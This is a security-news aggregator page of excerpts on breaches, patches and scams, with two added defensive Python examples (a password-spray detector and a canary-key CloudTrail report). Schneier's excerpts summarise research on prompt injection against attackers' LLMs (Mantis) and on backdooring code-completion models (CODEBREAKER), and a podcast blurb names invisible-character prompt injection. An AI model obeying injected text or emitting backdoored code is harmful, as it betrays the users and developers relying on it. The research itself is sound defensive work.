Posted on November 14, 2024 at 7:05 AM

6 days, 19 hours ago @ schneier.com
Mapping License Plate Scanners in the US


1 week ago @ schneier.com
Criminals Exploiting FBI Emergency Data Requests

I’ve been writing about the problem with lawful-access backdoors in encryption for decades now: that as soon as you create a mechanism for law enforcement to bypass encryption, the bad guys will use it too.

Turns out the same thing is true for non-technical backdoors: The advisory said that the cybercriminals were successful in masquerading as law enforcement by using compromised police accounts to send emails to companies requesting user data.

In some cases, the requests cited false threats, like claims of human trafficking and, in one case, that an individual would “suffer greatly or die” unless the company in question returns the requested i…

1 week, 1 day ago @ schneier.com
Friday Squid Blogging: Squid-A-Rama in Des Moines

Squid-A-Rama will be in Des Moines at the end of the month.

Visitors will be able to dissect squid, explore fascinating facts about the species, and witness a live squid release conducted by local divers.

How are they doing a live squid release?

Simple: this is Des Moines, Washington; not Des Moines, Iowa.

Posted on November 8, 2024 at 5:04 PM

1 week, 5 days ago @ schneier.com
AI Industry is Trying to Subvert the Definition of “Open Source AI”

The Open Source Initiative has published (news article here) its definition of “open source AI,” and it’s terrible.

And it’s confusing; most “open source” AI models—like LLAMA—are open source in name only.

But while open source should mean open source, there are some partially open models that need some sort of definition.

Because we want Open Source AI to exist also in fields where data cannot be legally shared, for example medical AI.

How about we call this “open weights” and not open source?

1 week, 5 days ago @ schneier.com
Prompt Injection Defenses Against LLM Cyberattacks

Interesting research: “Hacking Back the AI-Hacker: Prompt Injection as a Defense Against LLM-driven Cyberattacks”: Large language models (LLMs) are increasingly being harnessed to automate cyberattacks, making sophisticated exploits more accessible and scalable.

In response, we propose a new defense strategy tailored to counter LLM-driven cyberattacks.

We introduce Mantis, a defensive framework that exploits LLMs’ susceptibility to adversarial inputs to undermine malicious operations.

Upon detecting an automated cyberattack, Mantis plants carefully crafted inputs into system responses, leading the attacker’s LLM to disrupt their own operations (passive defense) or even compromise the attacke…

1 week, 6 days ago @ schneier.com
Subverting LLM Coders

Really interesting research: “An LLM-Assisted Easy-to-Trigger Backdoor Attack on Code Completion Models: Injecting Disguised Vulnerabilities against Strong Detection”: Abstract: Large Language Models (LLMs) have transformed code completion tasks, providing context-based suggestions to boost developer productivity in software engineering.

As users often fine-tune these models for specific applications, poisoning and backdoor attacks can covertly alter the model outputs.

To address this critical security challenge, we introduce CODEBREAKER, a pioneering LLM-assisted backdoor attack framework on code completion models.

Our extensive experimental evaluations and user studies underline the stron…

1 week, 6 days ago @ schneier.com
IoT Devices in Password-Spraying Botnet

Microsoft is warning Azure cloud users that a Chinese-controlled botnet is engaging in “highly evasive” password spraying.

Not sure about the “highly evasive” part; the techniques seem basically what you get in a distributed password-guessing attack: “Any threat actor using the CovertNetwork-1658 infrastructure could conduct password spraying campaigns at a larger scale and greatly increase the likelihood of successful credential compromise and initial access to multiple organizations in a short amount of time,” Microsoft officials wrote.

“This scale, combined with quick operational turnover of compromised credentials between CovertNetwork-1658 and Chinese threat actors, allows for the poten…
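The post above describes CovertNetwork-1658 as a distributed password-guessing operation: many compromised IoT devices, each making only a handful of attempts, against many accounts. What separates a spray from ordinary failed logins is therefore the combination of many distinct usernames and many distinct source IPs in a short window, with no single IP making many attempts. The detector below is an added example, not code from Microsoft's advisory or from Schneier's post; the log format, the thresholds and the sample log lines are constructed for the illustration, and a real deployment would parse Entra ID sign-in logs or SSH auth logs instead.

```python
"""Password-spray detector over simplified authentication log lines.

Added example (not from the original post). The log format is constructed:
  <ISO-8601 UTC timestamp> <username> <source IP> <FAIL|SUCCESS>
"""
from collections import Counter, defaultdict
from datetime import datetime, timezone

# Constructed sample: nine single-attempt failures from nine different source
# addresses against nine accounts inside twenty seconds, one success from a
# tenth address in the same window, then a normal "fat-fingered password"
# sequence from a single user and IP later in the day.
SAMPLE_LOG = """\
2024-11-01T10:00:01Z alice 203.0.113.10 FAIL
2024-11-01T10:00:03Z bob 203.0.113.11 FAIL
2024-11-01T10:00:05Z carol 203.0.113.12 FAIL
2024-11-01T10:00:07Z dave 203.0.113.13 FAIL
2024-11-01T10:00:09Z erin 203.0.113.14 FAIL
2024-11-01T10:00:11Z frank 203.0.113.15 FAIL
2024-11-01T10:00:13Z grace 203.0.113.16 FAIL
2024-11-01T10:00:15Z heidi 203.0.113.17 FAIL
2024-11-01T10:00:17Z ivan 203.0.113.18 FAIL
2024-11-01T10:00:19Z judy 203.0.113.19 SUCCESS
2024-11-01T11:30:00Z alice 198.51.100.7 FAIL
2024-11-01T11:30:05Z alice 198.51.100.7 FAIL
2024-11-01T11:30:09Z alice 198.51.100.7 SUCCESS
"""


def parse(log_text):
    """Turn the constructed log format into (time, user, ip, outcome) tuples."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, outcome = line.split()
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((when, user, ip, outcome))
    return events


def detect_spray(events, window_seconds=600, min_users=8, min_ips=5, max_per_ip=2):
    """Bucket events into fixed windows and flag a window as a spray when its
    failures hit at least min_users distinct accounts from at least min_ips
    distinct addresses while no single address exceeds max_per_ip attempts.
    A single address hammering one account is brute force, a different
    signature, and is deliberately not matched here. Thresholds are assumed
    starting points, not values from the advisory."""
    buckets = defaultdict(list)
    for ev in events:
        buckets[int(ev[0].timestamp()) // window_seconds].append(ev)

    alerts = []
    for key in sorted(buckets):
        bucket = buckets[key]
        fails = [e for e in bucket if e[3] == "FAIL"]
        users = {e[1] for e in fails}
        per_ip = Counter(e[2] for e in fails)
        if len(users) < min_users or len(per_ip) < min_ips:
            continue
        if max(per_ip.values()) > max_per_ip:
            continue
        start = datetime.fromtimestamp(key * window_seconds, tz=timezone.utc)
        alerts.append({
            "window_start": start.isoformat(),
            "distinct_users": len(users),
            "distinct_ips": len(per_ip),
            # Any success during a spray window deserves a look: the attacker
            # rotates through compromised credentials quickly, as the post notes.
            "suspected_compromise": sorted({e[1] for e in bucket if e[3] == "SUCCESS"}),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse(SAMPLE_LOG)):
        print(alert)
```

The thresholds trade off false positives against the spray's own low per-IP rate: raising max_per_ip catches sloppier operators but starts matching legitimate shared NAT egress, so tune it against a baseline of your own sign-in logs before alerting on it.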

2 weeks ago @ schneier.com
AIs Discovering Vulnerabilities

I’ve been writing about the possibility of AIs automatically discovering code vulnerabilities since at least 2018.

This is an ongoing area of research: AIs doing source code scanning, AIs finding zero-days in the wild, and everything in between.

Imagine that we have an AI that finds software vulnerabilities.

But the defenders can use the same AIs to find software vulnerabilities and then patch them.

And, eventually, those software vulnerabilities will be a thing of the past.

2 weeks, 1 day ago @ schneier.com
Sophos Versus the Chinese Hackers


2 weeks, 2 days ago @ schneier.com
Krebs On Security
last post 1 day, 6 hours ago
Fintech Giant Finastra Investigating Data Breach

The financial technology firm Finastra is investigating the alleged large-scale theft of information from its internal file transfer platform, KrebsOnSecurity has learned.

On November 8, 2024, Finastra notified financial institution customers that on Nov. 7 its security team detected suspicious activity on Finastra’s internally hosted file transfer platform.

Finastra also told customers that someone had begun selling large volumes of files allegedly stolen from its systems.

“There is no direct impact on customer operations, our customers’ systems, or Finastra’s ability to serve our customers currently,” the notice continued.

However, it did reference many of the same banks called out as Fin…

1 day, 6 hours ago @ krebsonsecurity.com
An Interview With the Target & Home Depot Hacker

Mr. Shefel, who recently changed his legal surname to Lenin, was the star of last year’s story, Ten Years Later, New Clues in the Target Breach.

Mr. Golubov could not be reached for comment, and Shefel says he no longer has the laptop containing evidence to support that claim.

“My nickname was MikeMike, and I worked with Dmitri Golubov and made technologies for him,” Shefel said.

“Helkern was my friend, I [set up a] meeting with Golubov and him in 2013,” Shefel said.

Incredibly, the day after our initial interview via Telegram, Shefel proposed going into business together.

6 days, 2 hours ago @ krebsonsecurity.com
Microsoft Patch Tuesday, November 2024 Edition

Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software.

The zero-day flaw tracked as CVE-2024-49039 is a bug in the Windows Task Scheduler that allows an attacker to increase their privileges on a Windows machine.

The two other publicly disclosed weaknesses Microsoft patched this month are CVE-2024-49019, an elevation of privilege flaw in Active Directory Certificate Services (AD CS); and CVE-2024-49040, a spoofing vulnerability in Microsoft Exchange Server.

For a more detailed breakdown of today’s patches from Microsoft, check out the SANS Internet Storm Center’s list.

For administrators in charge of managing larger Windows e…

1 week, 1 day ago @ krebsonsecurity.com
FBI: Spike in Hacked Police Emails, Fake Subpoenas

In some cases, a cybercriminal will offer to forge a court-approved subpoena and send that through a hacked police or government email account.

But increasingly, thieves are relying on fake EDRs, which allow investigators to attest that people will be bodily harmed or killed unless a request for account data is granted expeditiously.

“Unlimited Emergency Data Requests.

Donahue said even if one customer gets a fake request, Kodex is able to prevent the same thing from happening to another.

“A lot of global police agencies don’t have stringent cybersecurity hygiene, but even U.S. dot-gov emails get hacked.

1 week, 4 days ago @ krebsonsecurity.com
Canadian Man Arrested in Snowflake Data Extortions

A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake.

All told, more than 160 Snowflake customers were relieved of data, including TicketMaster, Lending Tree, Advance Auto Parts and Neiman Marcus.

On May 2, 2024, Judische claimed on the fraud-focused Telegram channel Star Chat that they had hacked Santander Bank, one of the first known Snowflake victims.

TELECOM DOMINOES: Mandiant has attributed the Snowflake compromises to a group it calls “UNC5537,” with members based in North America and Turkey.

“I’m not really someone that sells data unless it’s crypto [databases] or credit …

2 weeks, 1 day ago @ krebsonsecurity.com
Booking.com Phishers May Leave You With Reservations

This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen.

In November 2023, the security firm SecureWorks detailed how scammers targeted booking.com hospitality partners with data-stealing malware.

This seller claims to help people monetize hacked booking.com partners, apparently by using the stolen credentials to set up fraudulent listings.

A service advertised on the English-language crime community BreachForums in October courts phishers who may need help with certain aspects of their phishing campaigns targeting booking.com partners.

But that change came only after thieves used stolen credentials to siphon data from …

2 weeks, 5 days ago @ krebsonsecurity.com
Change Healthcare Breach Hits 100M Americans

A few days after BlackCat imploded, the same stolen healthcare data was offered for sale by a competing ransomware affiliate group called RansomHub.

“Change Health and United Health processing of sensitive data for all of these companies is just something unbelievable.

For most US individuals out there doubting us, we probably have your personal data.” It remains unclear if RansomHub ever sold the stolen healthcare data.

This process is now free for all Americans, and simply blocks potential creditors from viewing your credit file.

If you haven’t done so in a while, now would be an excellent time to review your credit file for any mischief or errors.

3 weeks ago @ krebsonsecurity.com
The Global Surveillance Free-for-All in Mobile Ad Data

The result is that there are a number of marketing companies that now enrich and broker access to this mobile location information.

What accounts for the disparity between the number of Android and Apple devices that can be found in mobile advertising data?

Google said its MAIDs are randomly generated and do not contain IP addresses, GPS coordinates, or any other location data, and that its ad systems do not share anyone’s precise location data.

Georgetown Law’s Justin Sherman said the data broker and mobile ad industries claim there are protections in place to anonymize mobile location data and restrict access to it, and that there are limits to the kinds of invasive inferences one can mak…

4 weeks ago @ krebsonsecurity.com
Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach

More recently, USDoD was behind a breach at the consumer data broker National Public Data that led to the leak of Social Security numbers and other personal information for a significant portion of the U.S. population.

According to TV Globo, USDoD is wanted domestically in connection with the theft of data on Brazilian Federal Police officers.

Additional reporting revealed National Public Data had inadvertently published its own passwords on the Internet.

In an interview with KrebsOnSecurity, USDoD acknowledged stealing the NPD data earlier this year, but claimed he was not involved in leaking or selling it.

Toward the end of that interview, USDoD said they were planning to launch a platfor…

1 month ago @ krebsonsecurity.com
Sudanese Brothers Arrested in ‘AnonSudan’ Takedown

The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers.

Active since at least January 2023, AnonSudan has been described in media reports as a “hacktivist” group motivated by ideological causes.

AnonSudan claimed credit for successful DDoS attacks on numerous U.S. companies, causing a multi-day outage for Microsoft’s cloud services in June 2023.

The two men also allegedly extorted some of their victims for money in…

1 month ago @ krebsonsecurity.com
Lamborghini Carjackers Lured by $243M Cyberheist

The parents of a 19-year-old Connecticut honors student accused of taking part in a $243 million cryptocurrency heist in August were carjacked a week later — while out house-hunting in a brand new Lamborghini.

But prosecutors in Connecticut said they were targeted “because the co-conspirators believed the victims’ son had access to significant amounts of digital currency.” What made the Miami men so convinced R.C.

One of the usernames leaked during the chat was Veer Chetal.

KrebsOnSecurity sought comment from Veer Chetal, and from his parents — Radhika Chetal and Suchil Chetal.

It is clear that other alleged co-conspirators to the $243 million heist displayed a conspicuous consumption of wea…

1 month, 1 week ago @ krebsonsecurity.com
Patch Tuesday, October 2024 Edition

Microsoft today released security updates to fix at least 117 security holes in Windows computers and other software, including two vulnerabilities that are already seeing active attacks.

Also, Adobe plugged 52 security holes across a range of products, and Apple has addressed a bug in its new macOS 15 “Sequoia” update that broke many cybersecurity tools.

One of the zero-day flaws — CVE-2024-43573 — stems from a security weakness in MSHTML, the proprietary engine of Microsoft’s Internet Explorer web browser.

Finally, Adobe has released security updates to plug a total of 52 vulnerabilities in a range of software, including Adobe Substance 3D Painter, Commerce, Dimension, Animate, Lightroom,…

1 month, 1 week ago @ krebsonsecurity.com
A Single Cloud Compromise Can Feed an Army of AI Sex Bots

Organizations that get relieved of credentials to their cloud environments can quickly find themselves part of a disturbing new trend: Cybercriminals using stolen cloud credentials to operate and resell sexualized AI-powered chat services.

Within minutes, their bait key was scooped up and used to power a service that offers AI-powered sex chats online.

But over the past six months, Ahl said, Bedrock has emerged as one of the top targeted cloud services.

“Bad guy hosts a chat service, and subscribers pay them money,” Ahl said of the business model for commandeering Bedrock access to power sex chat bots.

In June 2024, security experts at Sysdig documented a new attack that leveraged stolen cl…
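The excerpt above notes that a bait key planted by the researchers was scooped up and put to work within minutes. One way to operationalise such a honeytoken is to treat any use of the canary access key as an alert, record who used it and for what, and measure the delay between the key's creation and its first use. The function below is an added example, not code from the researchers quoted or from KrebsOnSecurity; it reads CloudTrail-style records whose field names (eventTime, eventSource, eventName, sourceIPAddress, userIdentity.accessKeyId, responseElements, errorCode) match real CloudTrail, but the records themselves and the AKIA… key IDs are constructed for the example and carry far fewer fields than real ones.

```python
"""Honeytoken (canary access key) usage report over CloudTrail-style records.

Added example (not from the original post). Record shapes follow CloudTrail
field names, but every record and key ID below is made up.
"""
import json
from datetime import datetime, timezone

# Constructed, abbreviated trail: an admin creates the canary key, an outside
# address tests it with STS and then tries Bedrock (and is denied), and an
# unrelated admin call follows.
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventTime": "2024-10-01T12:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "10.0.0.5",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLEADMIN0001"},
     "responseElements": {"accessKey": {"accessKeyId": "AKIAEXAMPLECANARY001"}}},
    {"eventTime": "2024-10-01T12:03:41Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLECANARY001"}},
    {"eventTime": "2024-10-01T12:04:02Z", "eventSource": "bedrock.amazonaws.com",
     "eventName": "InvokeModel", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLECANARY001"},
     "errorCode": "AccessDeniedException"},
    {"eventTime": "2024-10-01T12:10:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "sourceIPAddress": "10.0.0.5",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLEADMIN0001"}},
]})


def _parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def canary_report(trail_json, canary_keys):
    """Return, per canary key that was used, when it was first used, how long
    after its creation, from which addresses, which API calls were made, how
    many were denied, and whether Bedrock was attempted. A canary key has no
    legitimate caller, so every entry in the report is an alert, including
    denied calls: the attacker already holds the key."""
    records = json.loads(trail_json)["Records"]
    created = {}
    hits = {}
    for rec in records:
        caller_key = rec.get("userIdentity", {}).get("accessKeyId")
        new_key = rec.get("responseElements", {}).get("accessKey", {}).get("accessKeyId")
        if rec["eventName"] == "CreateAccessKey" and new_key in canary_keys:
            created[new_key] = _parse_time(rec["eventTime"])
        if caller_key in canary_keys:
            hits.setdefault(caller_key, []).append(rec)

    report = {}
    for key, recs in hits.items():
        first = min(_parse_time(r["eventTime"]) for r in recs)
        report[key] = {
            "first_use": first.isoformat(),
            "seconds_after_creation": (first - created[key]).total_seconds()
            if key in created else None,
            "source_ips": sorted({r["sourceIPAddress"] for r in recs}),
            # "sts:GetCallerIdentity" style labels, in trail order.
            "calls": [f'{r["eventSource"].split(".")[0]}:{r["eventName"]}' for r in recs],
            "denied_calls": sum(1 for r in recs if "errorCode" in r),
            "bedrock_attempted": any(r["eventSource"] == "bedrock.amazonaws.com" for r in recs),
        }
    return report


if __name__ == "__main__":
    print(json.dumps(canary_report(SAMPLE_TRAIL, {"AKIAEXAMPLECANARY001"}), indent=2))
```

The denied Bedrock call is the useful signal here: a canary deliberately has no permissions, so the attacker's first InvokeModel fails, but the attempt itself tells you which service they were after and from which address, which is what the researchers above observed with their bait key.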

1 month, 2 weeks ago @ krebsonsecurity.com
Crooked Cops, Stolen Laptops & the Ghost of UGNazi

“Damn my guy actually filed the warrant,” Iza allegedly texted someone after the location warrant was entered.

Iza’s indictment says he also harassed a man identified only as T.W., and refers to T.W.

According to the feds, Iza paid the associate $50,000 to craft the event to his liking, but on the day of the party Iza allegedly told R.C.

balked, Iza allegedly surrounded the man with armed LASD officers, who then extracted the payment by seizing his phone.

The complaint says Iza ran this business with another individual identified only as “T.H.,” and that at some point T.H.

1 month, 3 weeks ago @ krebsonsecurity.com
U.S. Indicts 2 Top Russian Hackers, Sanctions Cryptex

Joker’s Stash also was unique because it claimed to sell only payment cards that its own hackers had stolen directly from merchants.

At the time, card shops typically resold payment cards that were stolen and supplied by many third-party hackers of unknown reliability or reputation.

BRIANS CLUB: In late 2015, a major competitor to Joker’s Stash emerged using UAPS for its back-end payments: BriansClub.

Experts say most of those ATM inflows to Cryptex are bitcoin ATM cash deposits from customers of carding websites like BriansClub and Jokers Stash.

Treasury’s Financial Crimes Enforcement Network (FinCEN) levied sanctions today against PM2BTC under a powerful new “Section 9714” authority include…

1 month, 3 weeks ago @ krebsonsecurity.com
Graham Cluley
last post 7 hours ago
Smashing Security podcast #394: Digital arrest scams and stream-jacking

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by special guest Maria Varmazis.

Smashing Security listeners get $1000 off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Bluesky, or join us on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Bluesky, Mastodon, or Threads to read more of the exclusive content we post.

7 hours ago @ grahamcluley.com
The AI Fix #25: Beware of the superintelligence, and a spam-eating AI super gran

In episode 25 of The AI Fix, humanity creates a satellite called Skynet and then loses it, Graham folds proteins in the comfort of his living room, a Florida man gets a robot dog, Grok rats on its own boss, and a podcast host discovers Brazil nuts.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Hosts: Graham Cluley (@grahamcluley.com, @[email protected]) and Mark Stockley (@markstockley). Support the show: You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Bluesky, or subscribe for free…

1 day, 16 hours ago @ grahamcluley.com
Malware delivered via malicious QR codes sent in the post

Cybercriminals have adopted a novel trick for infecting devices with malware: sending out physical letters that contain malicious QR codes.

The letters claim that scanning the QR code will install a new severe weather app onto their Android smartphones.

However, according to the NCSC, the QR code's link actually takes Android users to a malicious app called Coper (also known as Octo2) which attempts to steal sensitive credentials from over 380 apps - including banking apps.

The app promoted in the letters mimics a genuine "Alertswiss" weather app used in Switzerland - spelled "AlertSwiss" in the fake version.

The NCSC is asking letter recipients to report it to them online and - obviously -…

1 day, 21 hours ago @ bitdefender.com
ShrinkLocker ransomware: what you need to know

6 days, 16 hours ago @ tripwire.com
IT specialist Jack Teixeira jailed for 15 years after leaking classified military documents on Discord

Jack Teixeira, the 22-year-old former Air National Guardsman who leaked hundreds of classified documents online, has been sentenced to 15 years in prison.

The leak triggered a major investigation into the state of national security and prompted reforms within the US military to stymie future breaches.

Initially, Teixeira committed classified information he viewed during his working day to memory, and then transcribed it at home to share online.

However, prosecutors described how his activities had later become more brazen, with the IT worker printing hard copies of classified documents on an "isolated and seldom used printer" at the airbase.

The FBI will continue to work diligently with our…

6 days, 19 hours ago @ bitdefender.com
Smashing Security podcast #393: Who needs a laptop to hack when you have a Firestick?

All this and much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Thom Langford.

Smashing Security listeners get $1000 off!

Support the show: You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us: Follow the show on Bluesky, Twitter, or join us on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

1 week ago @ grahamcluley.com
The AI Fix #24: Where are the alien AIs, and are we being softened up for superintelligence?

In episode 24 of The AI Fix, Mark makes an unforgivable error about the Terminator franchise, our hosts wonder if a “seductive” government chatbot will make it easier to talk about tax, a radio station abandons its three month AI experiment after a week, and OpenAI parks its tanks on Google’s lawn.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Hosts: Graham Cluley, Mark Stockley. Support the show: You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us: Follow the show on Twitter at @TheAIFix, subsc…

1 week, 1 day ago @ grahamcluley.com
Winter Fuel Payment scam targets UK citizens via SMS

1 week, 1 day ago @ tripwire.com
200,000 SelectBlinds customers have their card details skimmed in malware attack

SelectBlinds, a popular online retailer of blinds and shades, has disclosed a security breach that has impacted 206,238 of its customers.

For months, sensitive payment information was scraped unnoticed from online customers as they filled out the SelectBlinds checkout page to make their purchases.

SelectBlinds says it has now removed the malware from its website, and is enforcing a password reset for all user accounts.

Affected clients of SelectBlinds would be wise to keep a close eye on their payment card statements to see if there are any unusual transactions.

Credit-card skimming on website checkout pages is not a new threat.

1 week, 2 days ago @ bitdefender.com
Smashing Security podcast #392: Pasta spies and private eyes, and are you applying for a ghost job?

A Facebook friend request leads to arrest, Twitter scams ride again via promoted ads, and adult websites expose their members.

All this and more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Smashing Security listeners get $1000 off!

Follow us: Follow the show on Twitter at @SmashinSecurity, or on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

2 weeks ago @ grahamcluley.com
The AI Fix #23: Murder most weird, and why 9.11 is bigger than 9.9

Graham tells Mark a story involving a murder, a moth, and an AI journalist, and Mark pits his co-host against the world’s most advanced computer program in a maths Olympiad.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Hosts: Graham Cluley – @gcluley, Mark Stockley – @markstockley. Support the show: You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us: Follow the show on Twitter at @TheAIFix, subscribe for free in your favourite podcast app such as Apple Podcasts or Spotify, or visit our website f…

2 weeks, 1 day ago @ grahamcluley.com
Fired Disney worker accused of hacking into restaurant menus, replacing them with Wingdings and false peanut allergy information

According to the criminal complaint against him, Scheuer’s firing from Disney was contentious and not considered to be amicable.

The denial-of-service attack against Disney employees ceased approximately two minutes earlier, just before Scheuer spoke to the agents.

The FBI searched Scheuer's home for evidence, while Scheuer explained that Disney was attempting to frame him.

Coincidentally, or perhaps not, Scheuer had used the same VPN to access his company email from home since at least October 2023.

Fortunately all of the tampered menus were intercepted by Disney before they could be physically distributed to restaurant guests.

2 weeks, 5 days ago @ bitdefender.com
Fraudsters exploit US General Election fever, FBI warns

2 weeks, 6 days ago @ tripwire.com
Smashing Security podcast #391: The secret Strava service, deepfakes, and crocodiles

All this and more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Smashing Security listeners get $1000 off!

Support the show: You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us: Follow the show on Twitter at @SmashinSecurity, or on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

2 weeks, 6 days ago @ grahamcluley.com
The AI Fix #22: Probing AI tongues and ASCII smuggling attacks

Graham discovers a robot tongue and ponders the implications of AIs with an appetite, and Mark explains ASCII smuggling — a prompt injection attack that uses completely invisible characters.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Hosts: Graham Cluley – @gcluley, Mark Stockley – @markstockley. Support the show: You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us: Follow the show on Twitter at @TheAIFix, subscribe for free in your favourite podcast app such as Apple Podcasts or Spotify, or visit our website for …

3 weeks, 1 day ago @ grahamcluley.com
Companies 🏢
Kaspersky Blog
last post 16 hours ago
CVE-2024-10924, an authentication bypass vulnerability in WordPress

Bad news for companies running WordPress sites with two-factor authentication implemented through the Really Simple Security plugin.

A recently discovered vulnerability in this plugin, CVE-2024-10924, allows an outsider to authenticate on the site as a legitimate user.

Why CVE-2024-10924 is dangerous

Ironic as it may sound, the CVE-2024-10924 vulnerability in a plugin called Really Simple Security has a CVSS rating of 9.8 and is classified as critical.

Essentially, it is a flaw in the authentication mechanism that lets an attacker log in to the site as any of the users registered on it, with that user's full rights (even…

16 hours ago @ kaspersky.ru
Kaspersky Password Manager update | Kaspersky Blog

We walk through the design update in the Kaspersky Password Manager app for mobile devices.

1 day, 22 hours ago @ kaspersky.ru
Kaspersky Who Calls: setup guide | Kaspersky Blog

A Who Calls license can be purchased separately or as part of the comprehensive Kaspersky Plus and Kaspersky Premium security solutions, which protect not only against phone scammers but against many other threats as well.

Installing Kaspersky Who Calls for Android

If you are installing the free version, follow the link to choose the app store that suits you and download Who Calls.

If other Kaspersky apps, such as Kaspersky Plus or Kaspersky Premium, are already installed on your smartphone, Who Calls will offer a “Quick sign-in” to the My Kaspersky account you are using.

Installing Kaspersky Who Calls for iOS

To install the free version of Kaspersky Who Calls for iOS, go to the page of the app…

2 days, 19 hours ago @ kaspersky.ru
Simple and effective tips for protecting yourself from hackers | Kaspersky Blog

the master password for it, and everything else, from creating passwords to filling them in, will happen automatically.

Important nuances: the password manager must be installed on all of your devices so that you can enter passwords conveniently everywhere.

Your data will be synchronized across all of your devices, and once a password is saved on your smartphone you can automatically fill it into an input field on your computer, and vice versa.

Double-check links and attachments

Do not follow links or open files sent to you in a messenger or by email if you do not know who they are from and are not expecting any messages.

Kaspersky Premium includes a password manager and one-time authentication code manager, phishing protection and…

6 days, 23 hours ago @ kaspersky.ru
CVE-2024-43451 allows NTLMv2 hash theft | Kaspersky Blog

But at the same time, all current versions of Windows are affected by the vulnerability.

Why CVE-2024-43451 is dangerous

CVE-2024-43451 allows an attacker to create a file which, once it reaches the victim's computer, lets the attacker steal an NTLMv2 hash.

Of course, CVE-2024-43451 alone is not enough for this: a full-fledged attack would require additional vulnerabilities, but someone else's NTLMv2 hash makes the attacker's life considerably easier.

At the moment we have no additional information about attacks in which CVE-2024-43451 is being used in practice, but the vulnerability description clearly states that the vulnerability is public, exploitable, and that exploitation attempts have been detected.

In addition, it is worth remembering that most of the a…

1 week ago @ kaspersky.ru
How to save a web page forever or find the content of deleted sites | Kaspersky Blog

How to save a web page on your computer

Since a web page consists of dozens or hundreds of files, saving it takes a little effort.

To keep the main content of the page while getting rid of menus and banners, it is more convenient to send it to print, using the “Save as PDF” option as the “printer”.

How to save a web page for others

If you need not just a copy of the page for yourself but to share its captured state with other people, you will need public archiving services.

How to find deleted internet content or an old version of a site

To view an old version of any site: open web.archive.org; enter the full address of the site or of a specific page in the…

1 week, 1 day ago @ kaspersky.ru
How to keep your company from being hacked again | Kaspersky Blog

Serious information security incidents sometimes affect many participants, often including people who do not deal with IT and security matters day to day.

It is very useful to answer these questions even if the incident caused no significant damage, whether because of an effective response or simply a lucky coincidence.

First of all, gather answers to the questions of how and when the adversary got into the organization, which vulnerabilities and technical and organizational weaknesses they exploited, and how the attack unfolded.

Involving top management in this process is especially useful: as folk wisdom has it, security budgets are never allocated as quickly and generously as after a major incident.

It is important to clarify which parties…

1 week, 5 days ago @ kaspersky.ru
Kaspersky Lab discovers a cryptocurrency game from the Lazarus APT | Kaspersky Blog

The thing is that modern equivalents offer gamers not only a chance to play but also a chance to earn NFT tokens.

But what is special about this story, if we already know the attackers' main tool and methods perfectly well?

The cybercriminals lured the victim to the game's website and gained full access to their computer.

We at Kaspersky Lab respect the classics, so we could not resist the new tanks game.

At first we tried to log in to the accounts using popular passwords like “12345” or “password”, but that did not work.

1 week, 6 days ago @ kaspersky.ru
Tor Browser and anonymity: what you need to know | Kaspersky Blog

How Tor users get deanonymized

If you are hearing about Tor for the first time and have no idea how it works, read our vintage piece.

The operation that led to the discovery and arrest of the administrator of a pedophile platform was possible in part because Germany hosts a record number of Tor exit nodes, around 700.

